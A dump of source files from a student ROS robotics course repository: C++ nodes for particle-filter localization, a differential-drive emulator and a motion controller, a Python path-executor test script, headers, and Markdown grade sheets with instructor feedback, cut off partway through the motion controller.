"text": "#include <tf/tf.h>\n#include <visualization_msgs/Marker.h>\n#include <visualization_msgs/MarkerArray.h>\n\n#include \"particle_visualizer.h\"\n\nParticleVisualizer::ParticleVisualizer(const std::string& topic_name, const std::string& frame_id)\n: frame_id_(frame_id)\n{\n ros::NodeHandle nh;\n marker_publisher_ = nh.advertise<visualization_msgs::MarkerArray>(topic_name, 1);\n}\n\nvoid ParticleVisualizer::publish(const ParticleVector& particles)\n{\n if (marker_publisher_.getNumSubscribers() == 0) return;\n\n double min = std::min_element(particles.begin(), particles.end())->weight;\n double max = std::max_element(particles.begin(), particles.end())->weight;\n double range = (max - min) * 0.9;\n\n visualization_msgs::MarkerArray markers;\n for (const auto& particle : particles)\n {\n visualization_msgs::Marker marker;\n marker.ns = \"particles\";\n marker.header.frame_id = frame_id_;\n marker.type = visualization_msgs::Marker::ARROW;\n marker.action = visualization_msgs::Marker::ADD;\n marker.scale.x = 0.6;\n marker.scale.y = 0.1;\n marker.scale.z = 0.2;\n marker.color.a = range > 0 ? 0.1 + (particle.weight - min) / range : 1.0;\n marker.color.r = 0.0;\n marker.color.g = 0.2;\n marker.color.b = 0.8;\n marker.pose.orientation = tf::createQuaternionMsgFromYaw(particle.pose.theta);\n marker.pose.position.x = particle.pose.x;\n marker.pose.position.y = particle.pose.y;\n marker.pose.position.z = 0.05;\n marker.id = markers.markers.size();\n markers.markers.push_back(marker);\n }\n marker_publisher_.publish(markers);\n}\n\n"
},
{
"alpha_fraction": 0.6849335432052612,
"alphanum_fraction": 0.6913543343544006,
"avg_line_length": 37.930233001708984,
"blob_id": "d17634a3b8603c9c8b1324090d26da50b9f0676a",
"content_id": "d186e59d03ae57672fd728512bbc3f5c85454d7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6697,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 172,
"path": "/amr_localization/nodes/particle_filter.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <tf/tf.h>\n#include <tf/transform_listener.h>\n#include <tf/transform_broadcaster.h>\n#include <geometry_msgs/PoseWithCovarianceStamped.h>\n\n#include <amr_srvs/GetPoseLikelihood.h>\n\n#include \"particle_filter.h\"\n#include \"particle_visualizer.h\"\n\nclass ParticleFilterNode\n{\n\npublic:\n\n ParticleFilterNode()\n {\n // Query parameters from server\n ros::NodeHandle pn(\"~\");\n double update_rate;\n double world_width;\n double world_height;\n pn.param<double>(\"update_rate\", update_rate, 5.0);\n pn.param<std::string>(\"frame_id\", frame_id_, \"pf_pose\");\n // This will block until the stage node is loaded and has set the world\n // dimensions parameters\n while (!nh_.hasParam(\"world_width\") || !nh_.hasParam(\"world_height\"))\n ros::spinOnce();\n nh_.getParam(\"world_width\", world_width);\n nh_.getParam(\"world_height\", world_height);\n\n // Compute world extent\n double min_x, max_x, min_y, max_y;\n min_x = - world_width / 2.0;\n max_x = world_width / 2.0;\n min_y = - world_height / 2.0;\n max_y = world_height / 2.0;\n\n // Create particle filter and visualizer\n particle_filter_ = ParticleFilter::UPtr(new ParticleFilter(min_x, max_x, min_y, max_y, std::bind(&ParticleFilterNode::computeParticleWeight, this, std::placeholders::_1)));\n particle_visualizer_ = ParticleVisualizer::UPtr(new ParticleVisualizer(\"particles\", \"odom\"));\n\n // Quick Fix, reason is updateCallback: transform is used even though an error was catched, which happens at the start\n ros::Duration(1.0).sleep();\n\n // Schedule periodic filter updates\n update_timer_ = nh_.createTimer(ros::Rate(update_rate).expectedCycleTime(), &ParticleFilterNode::updateCallback, this);\n\n // Misc\n pose_estimate_subscriber_ = pn.subscribe<geometry_msgs::PoseWithCovarianceStamped>(\"pose_estimate\", 1, boost::bind(&ParticleFilterNode::poseEstimateCallback, this, _1));\n pose_likelihood_client_ = nh_.serviceClient<amr_srvs::GetPoseLikelihood>(\"/pose_likelihood_server/get_pose_likelihood\");\n previous_pose_.setIdentity();\n ROS_INFO(\"Started [particle_filter] node.\");\n }\n\n void updateCallback(const ros::TimerEvent& event)\n {\n // Determine the motion since the last update\n tf::StampedTransform transform;\n try\n {\n ros::Time now = ros::Time::now();\n tf_listener_.waitForTransform(\"base_link\", \"odom\", now, ros::Duration(0.1));\n tf_listener_.lookupTransform(\"base_link\", \"odom\", now, transform);\n }\n catch (tf::TransformException& e)\n {\n ROS_ERROR(\"Unable to compute the motion since the last update...\");\n return;\n }\n tf::Transform delta_transform = previous_pose_ * transform.inverse();\n previous_pose_ = transform;\n\n // In theory the obtained transform should be imprecise (because it is\n // based on the wheel odometry). In our system, however, we in fact get the\n // ground truth transform. It is therefore impossible to simulate the\n // \"kidnapped robot\" problem, because even if the robot is teleported in a\n // random spot in the world, the transform will be exact, and the particle\n // filter will not lose the track.\n // We test the length of the transform vector and if it exceeds some \"sane\"\n // limit we assume that the odometry system \"failed\" and feed identity\n // transform to the particle filter.\n if (delta_transform.getOrigin().length() > 2.0)\n delta_transform.setIdentity();\n\n // Perform particle filter update, note that the transform is in robot's\n // coordinate frame\n double forward = delta_transform.getOrigin().getX();\n double lateral = delta_transform.getOrigin().getY();\n double yaw = tf::getYaw(delta_transform.getRotation());\n particle_filter_->update(forward, lateral, yaw);\n\n // Visualize the particle set, broadcast transform, and print some information\n const auto& p = particle_filter_->getParticles();\n double avg_weight = std::accumulate(p.begin(), p.end(), 0.0, [](double sum, Particle p) { return sum + p.weight; }) / p.size();\n particle_visualizer_->publish(p);\n broadcastTransform();\n ROS_INFO(\"Motion: [%.3f, %.3f, %.3f] Average particle weight: %3f\", forward, lateral, yaw, avg_weight);\n }\n\n /** Broadcast the current estimation of robot's position. */\n void broadcastTransform()\n {\n tf::Transform transform;\n const auto& pose = particle_filter_->getPoseEstimate();\n transform.getOrigin().setX(pose.x);\n transform.getOrigin().setY(pose.y);\n transform.getOrigin().setZ(2.0); // elevate so that the tf frame appears above the particles in RViz\n transform.setRotation(tf::createQuaternionFromYaw(pose.theta));\n tf_broadcaster_.sendTransform(tf::StampedTransform(transform, ros::Time::now(), \"odom\", frame_id_));\n }\n\n /** Compute the weight of a partile.\n *\n * This function takes the pose from the particle, and uses external service\n * to determine how likely is that the robot is in this pose given the data\n * that it sensed. */\n double computeParticleWeight(const Particle& p)\n {\n amr_srvs::GetPoseLikelihood srv;\n srv.request.pose.pose.position.x = p.pose.x;\n srv.request.pose.pose.position.y = p.pose.y;\n srv.request.pose.pose.orientation = tf::createQuaternionMsgFromYaw(p.pose.theta);\n if (pose_likelihood_client_.call(srv))\n {\n return srv.response.likelihood;\n }\n else\n {\n ROS_ERROR(\"Service call to [get_pose_likelihood] failed, returning zero weight for the particle.\");\n return 0.0;\n }\n }\n\n /** This callback is triggered when someone sends a message with a pose\n * estimate to the \"~/pose_estimate\" topic. */\n void poseEstimateCallback(const geometry_msgs::PoseWithCovarianceStampedConstPtr& pose_estimate)\n {\n Pose p;\n p.x = pose_estimate->pose.pose.position.x;https://www7.inf.fh-bonn-rhein-sieg.de/moodle/file.php/1002/Lab/MR_Lab_2014-05-27.pdf\n p.y = pose_estimate->pose.pose.position.y;\n p.theta = tf::getYaw(pose_estimate->pose.pose.orientation);\n ROS_INFO_STREAM(\"Received pose estimate \" << p << \", forwarding it to the ParticleFilter object.\");\n particle_filter_->setExternalPoseEstimate(p);\n }\n\nprivate:\n\n ros::NodeHandle nh_;\n ros::ServiceClient pose_likelihood_client_;\n ros::Subscriber pose_estimate_subscriber_;\n ros::Timer update_timer_;\n tf::TransformListener tf_listener_;\n tf::TransformBroadcaster tf_broadcaster_;\n\n ParticleFilter::UPtr particle_filter_;\n ParticleVisualizer::UPtr particle_visualizer_;\n\n std::string frame_id_;\n tf::Transform previous_pose_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"particle_filter\");\n ParticleFilterNode pfn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.7281690239906311,
"avg_line_length": 36.421051025390625,
"blob_id": "fda545867b8341102bd9923247dcb81efa84d88b",
"content_id": "5921f4b272b93a11b2a7d21e2c865dd7f60619ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 710,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 19,
"path": "/grades/20140621.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments and documentation: 1/1\n* Expected explorative behaviour:\n - Moves preferably along planned paths, no wallfollowing when unnecessary: 1/1\n - Correct handing (removal) of unreachable paths 0/1\n - Stop and report on completion of exploration: 1/1\n - Correct stop and report on completion of exploration: 0/1\n* Use of own omni-drive or course differential motion controller node: 1/1\n* Use of own wallfollower node: 1/1\n* Use of own bug2 node: 1/1\n\n_Total:_ 6 points\n\nFeedback\n========\n\nNice job but too bad you did not manage to get Daiem's version onto the team repository. It was working pretty well. You only managed to explore about 15% of the map. Nice job though!"
},
{
"alpha_fraction": 0.7038796544075012,
"alphanum_fraction": 0.7173396944999695,
"avg_line_length": 41.099998474121094,
"blob_id": "f56f97ee78a72b96d1393ca0fd428f38222aeb34",
"content_id": "cf86dbd24b90e966fd06b16dbbdfabfaea70e701",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1263,
"license_type": "no_license",
"max_line_length": 361,
"num_lines": 30,
"path": "/grades/20140510.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Minimal version: 1/1\n - iterates through poses: yes\n - aborts when pose unreachable: yes\n* Parameter support: 1/1\n - obstacle avoidance: yes\n - skip unreachable: yes\n* Feedback publishing: 1/1\n* Properly filled result message: 1/1\n - when succeeded: yes\n - when aborted: yes\n* Preemption check: 1/1\n - is present: yes\n - periodical and cancels goal on [move_to] server: yes\n* Tests: 0.75/1\n - Test cases: yes\n - Automated test node: yes\n\n_Total:_ 5.75 points\n\nFeedback\n========\n\nYou misinterpreted the \"skip unreachable\" flag. When it is set, you are supposed to skip the unreachable pose and go to the next one. When it is set to false, you are supposed to stop the path execution when a pose is unreachable. You inverted this behaviour. But this is just a minor thing and I will not reduce the grade because of it. Just correct it please.\n\nThe implementation works very well. Nice job on that!\n\nThe test cases make sense. Too bad the automated test node does not actually test the path executor. Instead it runs the test without waiting for results (the old paths get preempted after a certain time period). We cannot give full points for this, but the structure of the test node seems to be ok. "
},
{
"alpha_fraction": 0.657879650592804,
"alphanum_fraction": 0.675071656703949,
"avg_line_length": 34.591835021972656,
"blob_id": "531cc35161bc99540253b37060993d1ae2adc2ae",
"content_id": "38f4b0ef78cd53705127325d3760a2cddb01a046",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1745,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 49,
"path": "/amr_braitenberg/nodes/differential_drive_emulator.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <geometry_msgs/Twist.h>\n\n#include <amr_msgs/WheelSpeeds.h>\n\nros::Subscriber wheel_speed_subscriber;\nros::Publisher velocity_publisher;\ndouble wheel_diameter;\ndouble distance_between_wheels;\n\nvoid wheelSpeedCallback(const amr_msgs::WheelSpeeds::ConstPtr& msg)\n{\n // Check that the message contains exactly two wheel speeds, otherwise it is\n // meaningless for this emulator.\n if (msg->speeds.size() != 2)\n {\n ROS_WARN(\"Ignoring WheelSpeeds message because it does not contain two wheel speeds.\");\n return;\n }\n\n geometry_msgs::Twist twist;\n\n /** The formulars used for this emulator are:\n * v = (r/2) * (vr + vl) and w = (r/D) * (vr - vl)\n * vr, vl and w are in [rad/s] and v in [m/s]. */\n twist.linear.x = (wheel_diameter / (2.0 * 2.0)) * (msg->speeds.at(0) + msg->speeds.at(1));\n twist.angular.z = (wheel_diameter / (distance_between_wheels * 2.0)) * (msg->speeds.at(0) - msg->speeds.at(1));\n\n velocity_publisher.publish(twist);\n ROS_DEBUG(\"[%.2f %.2f] --> [%.2f %.2f]\", msg->speeds[0], msg->speeds[1], twist.linear.x, twist.angular.z);\n}\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"differential_drive_emulator\");\n // Read differential drive parameters from server.\n ros::NodeHandle pn(\"~\");\n pn.param(\"wheel_diameter\", wheel_diameter, 0.15);\n pn.param(\"distance_between_wheels\", distance_between_wheels, 0.5);\n // Create subscriber and publisher.\n ros::NodeHandle nh;\n wheel_speed_subscriber = nh.subscribe(\"/cmd_vel_diff\", 100, wheelSpeedCallback);\n velocity_publisher = nh.advertise<geometry_msgs::Twist>(\"/cmd_vel\", 100);\n // Start infinite loop.\n ROS_INFO(\"Started differential drive emulator node.\");\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.5197817087173462,
"alphanum_fraction": 0.5258234143257141,
"avg_line_length": 31.48101234436035,
"blob_id": "f6b4eeca4d38f25869f0f1570a910e822b65bed8",
"content_id": "db18ca36a2b3ba41bc92a6eee878d3bcadcfc4aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5131,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 158,
"path": "/amr_navigation/nodes/test_path_executor.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nPACKAGE = 'amr_navigation'\nNODE = 'automated_tester'\n\nimport roslib\nroslib.load_manifest(PACKAGE)\nimport rospy\nimport os\n\nimport sys\nimport argparse\nfrom tf.transformations import quaternion_from_euler, euler_from_quaternion\nfrom geometry_msgs.msg import PoseStamped\nfrom actionlib import SimpleActionClient\nfrom amr_msgs.msg import ExecutePathGoal, ExecutePathAction\n\n\ndef to_str(pose):\n rpy = euler_from_quaternion((pose.orientation.x, pose.orientation.y,\n pose.orientation.z, pose.orientation.w))\n return '%.3f %.3f %.3f' % (pose.position.x, pose.position.y, rpy[2])\n\ndef print_test_passed(expected,original):\n if(expected == original):\n print 'Test Passed'\n else:\n print 'Test Failed'\n pass\n\ndef feedback_cb(feedback):\n print ' -> %s %s' % ('visited' if feedback.reached else 'skipped',\n to_str(feedback.pose.pose))\n way_point_reached.append([True if feedback.reached else False])\n pass\n\ndef done_cb(status, result):\n print ''\n print 'Result'\n print '------'\n\n if result:\n for i, p, v in zip(range(1, len(poses) + 1), goal.path.poses,\n result.visited):\n print '%2i) %s %s' % (i, 'visited' if v else 'skipped',\n to_str(p.pose))\n print ''\n\n state = ['pending', 'active', 'preempted', 'succeeded', 'aborted',\n 'rejected', 'preempting', 'recalling', 'recalled',\n 'lost'][status]\n print 'Action completed, state:', state\n \n\n for i in xrange(len(way_point_reached)):\n print_test_passed(way_points_result[i],way_point_reached[i])\n \n # rospy.signal_shutdown('Path execution completed')\n pass\n\n\nif __name__ == '__main__':\n # We need this for command line arguments\n argv = sys.argv[1:]\n \n # Left wall following or Right wall following \n wall = 0\n skip_unreachable = 1;\n\n # path to test files\n path = roslib.packages.get_pkg_dir(\"amr_navigation\", required=True) + \"/../evaluation/path_executor_test_cases/\"\n test_cases = os.listdir(path);\n\n rospy.init_node(NODE, anonymous=True)\n SERVER = '/path_executor/execute_path'\n ep_client = SimpleActionClient(SERVER, ExecutePathAction)\n print 'Connecting to [%s] server...' % SERVER\n ep_client.wait_for_server()\n\n for test_file in test_cases:\n # File name\n # correct file name = \"*.pth\"\n execution_time = 15\n if(not(test_file.find('.pth') >= 0) or (test_file.find('~') >= 0) ):\n continue\n print \"file: \"+test_file\n # Load test case parameters from file:\n # Loading waypoints\n way_points = []\n way_points_result = []\n with open(path + test_file) as way_point_file:\n line_count = 0\n results = False\n for line in way_point_file:\n if(line.find('skip') >= 0):\n flag = line.split('=')\n skip_unreachable = int(flag[1])\n continue\n\n if(line.find('time') >= 0):\n flag = line.split('=')\n execution_time = int(flag[1])\n continue\n\n if(line.find('--end') == 0):\n results = True\n continue\n if results:\n way_points_result.append(bool(int(line)))\n else:\n numbers = line.split()\n pose = []\n for num in numbers:\n try:\n pose.append(float(num));\n except ValueError:\n print 'Unable to convert to float: '+num; \n \n way_points.append(pose);\n line_count = line_count + 1;\n\n # Preparing data to publish to action client\n string = \"\"\n for a in way_points:\n string = string + \"\".join(str(a))[1:-1] + \"\\n\"\n \n way_point_reached = []\n poses = []\n goal = ExecutePathGoal()\n\n for i,pose in enumerate(way_points):\n try:\n x, y, yaw = pose;\n except ValueError:\n print_test_passed(way_points_result[i],False);\n continue;\n p = PoseStamped()\n q = quaternion_from_euler(0, 0, yaw)\n p.pose.position.x = x\n p.pose.position.y = y\n p.pose.orientation.x = q[0]\n p.pose.orientation.y = q[1]\n p.pose.orientation.z = q[2]\n p.pose.orientation.w = q[3]\n goal.path.poses.append(p)\n poses.append((x, y, yaw))\n goal.skip_unreachable = skip_unreachable\n \n print ''\n print 'Goal'\n print '----'\n print 'Poses:'\n for i, p in enumerate(goal.path.poses):\n print '%2i) %s' % (i + 1, to_str(p.pose))\n print 'Skip unreachable:', skip_unreachable\n ep_client.send_goal(goal, done_cb=done_cb, feedback_cb=feedback_cb)\n rospy.sleep(execution_time);\n pass"
},
{
"alpha_fraction": 0.6850733160972595,
"alphanum_fraction": 0.7023295760154724,
"avg_line_length": 24.733333587646484,
"blob_id": "eda53378dd18a125695f44a2348ab8136c95deb6",
"content_id": "8f7cf128df280da58099d8a29dc25fe393eb7202",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 45,
"path": "/amr_navigation/include/velocity_controller.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef VELOCITY_CONTROLLER_H\n#define VELOCITY_CONTROLLER_H\n\n#include <cmath>\n\n#include \"pose.h\"\n#include \"velocity.h\"\n\n/** Abstract class which declares an interface for velocity controllers.\n *\n * Velocity controller is an object that can compute the velocity that the\n * robot should have in order to reach some goal given the current pose.\n *\n * Different controllers may implement different velocity profiles. */\nclass VelocityController\n{\n\npublic:\n\n typedef std::unique_ptr<VelocityController> UPtr;\n\n virtual void setTargetPose(const Pose& pose) = 0;\n\n virtual bool isTargetReached() const = 0;\n\n virtual Velocity computeVelocity(const Pose& actual_pose) = 0;\n\nprotected:\n\n /** Helper function to compute the Euclidean distance between two points. */\n static float getDistance(const Pose& p1, const Pose& p2)\n {\n return sqrt((p1.x - p2.x) * (p1.x - p2.x) + (p1.y - p2.y) * (p1.y - p2.y));\n }\n\n /** Helper function to compute the angular distance between two angles (in\n * radians). */\n static float getShortestAngle(float a1, float a2)\n {\n return atan2(sin(a1 - a2), cos(a1 - a2));\n }\n\n};\n\n#endif /* VELOCITY_CONTROLLER_H */\n\n"
},
{
"alpha_fraction": 0.6157635450363159,
"alphanum_fraction": 0.6699507236480713,
"avg_line_length": 12.533333778381348,
"blob_id": "b66ecc800c0a9ac01f6f8b606b9e6b4296082c01",
"content_id": "cfa6bafa75ee81da84b94ee0b5cb719abaf0cd1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 203,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 15,
"path": "/grades/20140531.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments: 1/1\n* ROS infrastructure: 1/1\n* Laser pose calculation: 1/1\n* Probability calculation: 2/2\n* Tolerance against bad matches: 1/1\n\n_Total:_ 6 points\n\nFeedback\n========\n\nWell done!\n"
},
{
"alpha_fraction": 0.7120596170425415,
"alphanum_fraction": 0.7154471278190613,
"avg_line_length": 31.076086044311523,
"blob_id": "5b0ce9b210e0dc669999da6d9d6cdafe4b0fad74",
"content_id": "d993a7edcba07da917a814dfdc79f04c43515d2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2952,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 92,
"path": "/amr_localization/include/particle_filter.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef PARTICLE_FILTER_H\n#define PARTICLE_FILTER_H\n\n#include <memory>\n#include <functional>\n\n#include \"particle.h\"\n#include \"motion_model.h\"\n#include \"random_particle_generator.h\"\n\nclass ParticleFilter\n{\n\npublic:\n\n /** Convenience type for unique pointer to ParticleFilter. */\n typedef std::unique_ptr<ParticleFilter> UPtr;\n\n /** Convenince type for functions that compute the weigth of a particle. */\n typedef std::function<double(const Particle&)> ComputeParticleWeightCallback;\n\n /** Construct a particle filter.\n *\n * The first four parameters define the extent of the world. This influences\n * the region in which a random particle might appear. The last parameter is\n * a callback to a function that should be used to compute the weight of a\n * particle. The particle filter per se does not depend on what physical\n * meaning the particle weight has and how it is computed, and thus its\n * computation is outsourced to this function. */\n ParticleFilter(double map_min_x, double map_max_x,\n double map_min_y, double map_max_y,\n ComputeParticleWeightCallback callback);\n\n /** Given a motion command compute the new belief state of the filter. */\n void update(double x, double y, double yaw);\n\n /** Get the current porticle set that represents the belief state of the\n * particle filter. */\n const ParticleVector& getParticles() const { return particles_; }\n\n /** Get the current best estimate of the robot's pose. */\n Pose getPoseEstimate() const { return pose_estimate_; }\n\n /** Set the external estimate of the robot's pose. */\n void setExternalPoseEstimate(Pose pose) { random_particle_generator_.setBias(pose, 0.5, 500); }\n\nprivate:\n\n /** Particle weight computation callback. */\n ComputeParticleWeightCallback callback_;\n\n /** Current particle set. */\n ParticleVector particles_;\n\n /* Particle filter parameters */\n\n /** Number of particles in the current particle set after resampling.\n *\n * The suggested default value: 50. */\n size_t particle_set_size_;\n\n /** Number of new particles to generate per existing particle in the motion\n * update step.\n *\n * The suggested default value is 1. */\n size_t motion_guesses_;\n\n /** Number of new random particles drawn from the uniform distribution over\n * the map on each update.\n *\n * This is needed to recover from grossly wrong position estimates.\n *\n * The suggested default value: 15% of the particle set size. */\n double random_particles_size_;\n\n // The current best pose estimate\n Pose pose_estimate_;\n\n // Motion model used to sample the poses in motion update step\n MotionModel motion_model_;\n\n // Required for random number generation\n std::default_random_engine random_generator_;\n\n // A helper object that will generate biased/unbiased random particles\n RandomParticleGenerator random_particle_generator_;\n\n bool is_initialized;\n\n};\n\n#endif /* PARTICLE_FILTER_H */\n\n"
},
{
"alpha_fraction": 0.6651517748832703,
"alphanum_fraction": 0.6689246892929077,
"avg_line_length": 34.22960662841797,
"blob_id": "9f7514f7f6a1785050e59dd522b2e74f1fc94481",
"content_id": "7319a66c93284cc36c046782ef5ec188f77a3358",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11662,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 331,
"path": "/amr_navigation/nodes/motion_controller.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <actionlib/server/simple_action_server.h>\n#include <geometry_msgs/Twist.h>\n#include <geometry_msgs/PoseStamped.h>\n#include <tf/transform_listener.h>\n\n#include <amr_msgs/MoveToAction.h>\n#include <amr_msgs/Obstacle.h>\n#include \"velocity_controller.h\"\n#include \"diff_velocity_controller.h\"\n#include \"omni_velocity_controller.h\"\n\nclass MotionControllerNode\n{\n\npublic:\n\n /** Node constructor.\n *\n * Creates all required servers, publishers, and listeners. Reads the\n * parameters from server and creates an instance of one of the classes that\n * implement the @ref VelocityController interface, which is later used to\n * compute the values for robot velocity. */\n MotionControllerNode()\n : transform_listener_(ros::Duration(10))\n {\n ros::NodeHandle nh;\n ros::NodeHandle pn(\"~\");\n // Parameters\n pn.param(\"controller_frequency\", controller_frequency_, 10.0);\n pn.param(\"abort_if_obstacle_detected\", abort_if_obstacle_detected_, true);\n // Publishers\n velocity_publisher_ = nh.advertise<geometry_msgs::Twist>(\"cmd_vel\", 10);\n current_goal_publisher_ = pn.advertise<geometry_msgs::PoseStamped>(\"current_goal\", 0, true); // enable \"latching\" on a connection\n action_goal_publisher_ = pn.advertise<amr_msgs::MoveToActionGoal>(\"move_to/goal\", 1);\n // Subscribers\n simple_goal_subscriber_ = pn.subscribe<geometry_msgs::PoseStamped>(\"move_to_simple/goal\", 1, boost::bind(&MotionControllerNode::simpleGoalCallback, this, _1));\n if (abort_if_obstacle_detected_)\n obstacles_subscriber_ = nh.subscribe<amr_msgs::Obstacle>(\"obstacles\", 100, boost::bind(&MotionControllerNode::obstaclesCallback, this, _1));\n // Action server\n move_to_server_ = MoveToActionServerUPtr(new MoveToActionServer(pn, \"move_to\", boost::bind(&MotionControllerNode::moveToCallback, this, _1), false));\n move_to_server_->start();\n // Velocity controller\n createVelocityController();\n ROS_INFO(\"Started [motion_controller] node.\");\n }\n\n /** This callback is triggered when someone sends an action command to the\n * \"move_to\" server. */\n void moveToCallback(const amr_msgs::MoveToGoalConstPtr& goal)\n {\n\n ROS_INFO(\"Received [move_to] action command.\");\n\n if (!setNewGoal(goal))\n return;\n\n // Start an infinite loop where in each iteration we try to advance towards\n // the goal and also check if the goal has been preempted (i.e. a new goal\n // was given). The loop is terminated if the goal was reached, or if the\n // node itself shuts down.\n ros::Rate rate(controller_frequency_);\n ros::NodeHandle nh;\n while (nh.ok())\n {\n // Exit if the goal was aborted\n if (!move_to_server_->isActive())\n return;\n\n // Process pending preemption requests\n if (move_to_server_->isPreemptRequested())\n {\n ROS_INFO(\"Action preemption requested.\");\n if (move_to_server_->isNewGoalAvailable() && setNewGoal(move_to_server_->acceptNewGoal()))\n {\n // A new valid goal was given and accepted. Notify the ActionServer\n // that we preempted and proceed to execute the action.\n // move_to_server_->setPreempted();\n }\n else\n {\n // We have been preempted explicitly, without a new goal therefore we\n // need to shut things down\n publishZeroVelocity();\n // Notify the ActionServer that we have successfully preempted\n move_to_server_->setPreempted();\n // No goal - no actions, just exit the callback\n return;\n }\n }\n\n // Issue a command to move towards the current goal\n if (!moveTowardsGoal())\n {\n // Finish execution if the goal was reached\n move_to_server_->setSucceeded(amr_msgs::MoveToResult(), \"Goal reached.\");\n publishZeroVelocity();\n return;\n }\n\n rate.sleep();\n }\n\n // We get here only if nh.ok() returned false, i.e. the node has received\n // a shutdown request\n move_to_server_->setAborted(amr_msgs::MoveToResult(), \"Aborted. The node has been killed.\");\n }\n\n /** This callback is triggered when someone sends a message with a new target\n * pose to the \"move_to_simple/goal\" topic.\n *\n * The function simply packs the supplied pose into an action message and\n * re-sends it to the action server for the execution. */\n void simpleGoalCallback(const geometry_msgs::PoseStampedConstPtr& target_pose)\n {\n ROS_INFO(\"Received target pose through the \\\"simple goal\\\" topic. Wrapping it in the action message and forwarding to the server.\");\n amr_msgs::MoveToActionGoal action_goal;\n action_goal.header.stamp = ros::Time::now();\n action_goal.goal.target_pose = *target_pose;\n action_goal_publisher_.publish(action_goal);\n }\n\n /** This callback is triggered when an obstacle was detected.\n *\n * The current action (if any) will be cancelled. */\n void obstaclesCallback(const amr_msgs::ObstacleConstPtr& obstacle)\n {\n ROS_WARN_THROTTLE(1, \"An obstacle was detected. Will stop the robot and cancel the current action.\");\n if (move_to_server_->isActive())\n move_to_server_->setAborted(amr_msgs::MoveToResult(), \"Aborted. An obstacle was detected.\");\n publishZeroVelocity();\n }\n\nprivate:\n\n /** Try to advance towards the current target pose.\n *\n * Queries the current position of the base in the odometry frame and\n * passes it to the @ref VelocityController object, which calculates the\n * velocities that are needed to move in the target pose direction.\n *\n * @return false if the goal pose was reached, true if we need to proceed. */\n bool moveTowardsGoal()\n {\n tf::StampedTransform transform;\n try\n {\n ros::Time time;\n std::string str;\n transform_listener_.getLatestCommonTime(\"odom\", \"base_footprint\", time, &str);\n transform_listener_.lookupTransform(\"odom\", \"base_footprint\", time, transform);\n }\n catch (tf::TransformException& ex)\n {\n ROS_WARN(\"Transform lookup failed (\\\\odom -> \\\\base_footprint). Reason: %s.\", ex.what());\n return true; // goal was not reached\n }\n\n Pose current_pose(transform.getOrigin().getX(), transform.getOrigin().getY(), tf::getYaw(transform.getRotation()));\n Velocity velocity = velocity_controller_->computeVelocity(current_pose);\n\n if (velocity_controller_->isTargetReached())\n {\n ROS_INFO(\"The goal was reached.\");\n return false;\n }\n else\n {\n publishVelocity(velocity);\n return true;\n }\n }\n\n /** Set new target pose as given in the goal message.\n *\n * Checks if the orientation provided in the target pose is valid.\n * Publishes the goal pose for the visualization purposes.\n *\n * @return true if the goal was accepted. */\n bool setNewGoal(const amr_msgs::MoveToGoalConstPtr& new_goal)\n {\n if (!isQuaternionValid(new_goal->target_pose.pose.orientation))\n {\n ROS_WARN(\"Aborted. Target pose has invalid quaternion.\");\n move_to_server_->setAborted(amr_msgs::MoveToResult(), \"Aborted. Target pose has invalid quaternion.\");\n return false;\n }\n else\n {\n double x = new_goal->target_pose.pose.position.x;\n double y = new_goal->target_pose.pose.position.y;\n double yaw = tf::getYaw(new_goal->target_pose.pose.orientation);\n Pose pose(x, y, yaw);\n velocity_controller_->setTargetPose(pose);\n poseStampedMsgToTF(new_goal->target_pose, target_pose_);\n target_pose_.frame_id_ = \"odom\";\n current_goal_publisher_.publish(new_goal->target_pose);\n ROS_INFO_STREAM(\"New target pose: \" << pose);\n return true;\n }\n }\n\n /** Checks if the quaternion is a valid navigation goal, i.e. has non-zero\n * length and is close to vertical. */\n bool isQuaternionValid(const geometry_msgs::Quaternion& q)\n {\n // Ensure that the quaternion does not have NaN's or infinities\n if (!std::isfinite(q.x) || !std::isfinite(q.y) || !std::isfinite(q.z) || !std::isfinite(q.w))\n {\n ROS_WARN(\"Quaternion has NaN's or infinities.\");\n 